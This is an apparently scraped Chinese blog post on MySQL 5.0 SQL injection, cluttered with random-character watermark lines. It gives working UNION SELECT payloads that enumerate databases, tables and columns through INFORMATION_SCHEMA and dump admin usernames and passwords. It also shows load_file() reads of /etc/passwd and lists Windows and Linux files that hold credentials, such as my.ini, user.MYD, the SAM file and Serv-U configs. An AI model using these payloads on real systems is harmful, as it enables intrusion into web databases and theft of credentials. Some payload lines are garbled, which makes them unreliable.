mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
/ Q% ~4 P. c2 f/ p2 q: N

4 d4 I5 A9 a$ ^+ n  @3 k; C- S- s
4 ]/ u3 h1 r6 f4 ^Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
0 ^, M% N2 H( D0 N2 N( X1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
( E$ W6 k2 W' g$ S4 {& B' `|—字段：SCHEMA_NAME ->数据库名称
! D4 Z: S- A. i9 P  D
|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
, l3 M) v; v- ?4 ?! t|—字段：TABLE_NAME ->存储表的表名

6 u5 u% x5 N6 G7 d+ N: O! B6 B|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称
9 M$ S" U, E8 r- g6 a
6 X9 e, e& R' w3 G$ u|—字段：COLUMN_NAME ->该字段的名称

* ?. g. Z' O4 I/ j! r#########################################################################
##

0×001 获取系统信息:

+ W  X" d/ h8 E6 h$ `union select 1,2,3,4,5,concat
+ {. Q7 w  s2 }% _$ ](@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

3 H0 v' G: w1 h0 X/*
. K& c# w8 w8 H. v  b
: v8 h8 }3 _% q9 h0 j@@global.version_compile_os 获取系统版本

' |/ u+ e) O; M4 j@@datadir 数据库路径
& i  g4 A. S4 b& g# Odatabase() 当前数据库名称
0 T; \+ S1 f+ P# Q8 A1 B: W0x3c62723e 换行HEX值

*/

######################################################################
9 ~0 ]- F2 J: W, e) `
0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*

) S/ A5 N) E9 {: I+ U/*
/ b. ?1 V" k$ c  @  E& d$ M
/ h% j5 T/ [! c3 d0x67617264656e 为当前数据库名
6 h* n: i: d+ D* R& N1 u5 ]6 L% ]2 s
4 t6 y( d/ d+ g3 I$ B; Hgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名

# S* v/ Z1 ~# ?/ q*/
9 V8 U: f2 `1 `$ `' X) F
######################################################################
2 g  E2 r# S/ z% F
0×003 获取字段
- b% ~. Q4 e1 C( W# @/ x! J
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
& Q- h1 F( U6 W4 Y9 m1 }information_schema.columns where table_name=0x61646d696e and


table_schema=0x67617264656e limit 1 /*

4 s. q" Q7 [9 g& y) P/*
' A2 M/ |% L  j6 z% _4 i
group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

3 O! u& `% z* L6 F7 l0x61646d696e ->选择一个表
9 A' @% y% }# ?2 w5 s- w
0x67617264656e ->数据库名
) q, B$ _, i* i$ p: [( B
( [' F6 u, l8 T/ v) @, R1 A; i+ I*/
. s, K  F" o% m% ], c
; j4 \9 J" p# {9 d! H#####################################################################
. S) a8 `1 A  j
2 f( k7 b6 ^. Y" O5 i# u+ m0×004 获取数据
/ H# Q( m* Y7 k: B
union select 1,2,3
( y, \$ n2 T- E9 L7 C; u6 f4 ?,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

0 ^9 O+ l7 t4 [3 L' `; b9 X! X+ ^union select 1,group_concat(id),group_concat(adname),4,5,group_concat
4 |7 v( ?. u+ b% i& i! u3 I(adpassword),6,7,8 from admin
& S- r$ _+ K# b3 e3 I9 B7 W/ c
/*
' R. i7 h7 J% B0 i  b
9 c, E$ J0 m3 ?0 B) Q2 l; u; h0x3c62723e 换行符号HEX编码

1 E7 b* e/ U* V, C5 _group_concat 同时获得该字段所有数据

* O4 P7 c9 i& Q+ l*/
: ~+ y2 t  m3 @  ^, t


6 m& |8 q1 V/ E( g
- _+ n, n* x5 \0 U8 b" |# A" ?: z
% s. G# O# f, C$ _1 b顺便添加一些mysql注入时非常有用的一些东西
- N$ E/ w% I# y0 d3 H; i; j
. \7 D& x  ]0 g& _/ `简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
2:user()        用户名
3:current_user()  当前用户名
( m) ^7 t8 U8 N, u4:session_user()连接数据库的用户名
5:database()    数据库名
( r% ~; c1 L* V2 i; F! h, Q6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
" W/ N3 b. v7 D. S0 v; P8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
& J. ^2 w/ s* j# KWINDOWS下:
c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
3 O, i, w( O# r) b% Uc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
/ I4 z& u( W+ G5 @! ?/ |# lc:/winnt/php.ini
" E( K# Y9 s& _, K( `% Uc:/winnt/my.ini
$ m; t7 s- `! gc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
8 L4 m' N# g' o  S. m* E! }c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
0 t$ a$ E& s3 Sc:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
6 n4 L% U* m% K% Q* d8 P+ M% Pc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
1 D3 T( x! v5 f) D/ jc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
8 G8 U, ]% `5 N- o+ p7 ]: X2 Dc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
$ n3 S, I( n* I( Ac:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
: m' o/ [1 [) @" g
% [5 z2 K' a- c  Y5 J
: h" }! c" P* p7 D$ e. d  p; ?c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
# z8 h! n# E' x* Q4 i4 Ed:\APACHE\Apache2\conf\httpd.conf
/ H$ W$ |+ {3 |8 ~C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
1 V0 f! x1 K% {+ }
; t: W) n' d' }6 R! u3 \2 U9 t! L3 fLUNIX/UNIX下:
% C& W4 C6 {& C/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
3 D) w2 M7 Y# o4 A- t/etc/httpd/conf/httpd.conf // apache配置文件
. S: P1 |- `! {8 M' V/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
+ O+ |1 d. Y: L4 C0 ?/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
9 R: Z+ N  k" _: ~: A  g/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
& H% X# z3 m2 W, E( ~$ ~/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
  k+ v7 B: E4 A% r9 Q3 T+ H* s+ h5 b/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
; I2 w& I% [1 g/ N, U# T/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
  T1 |: e0 \6 |( q  t" ]8 W( n/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
) c0 @: ?& v$ {/ z/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
+ S) t" M* _/ L/etc/sysconfig/iptables 查看防火墙策略
% D3 \+ [( @) z( Y2 Kload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
" \+ A  r3 ~4 J7 @+ Z9 ~上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
& a) o' O7 a2 P0 S$ x
& c! i* `9 q4 y' Y1 A/ o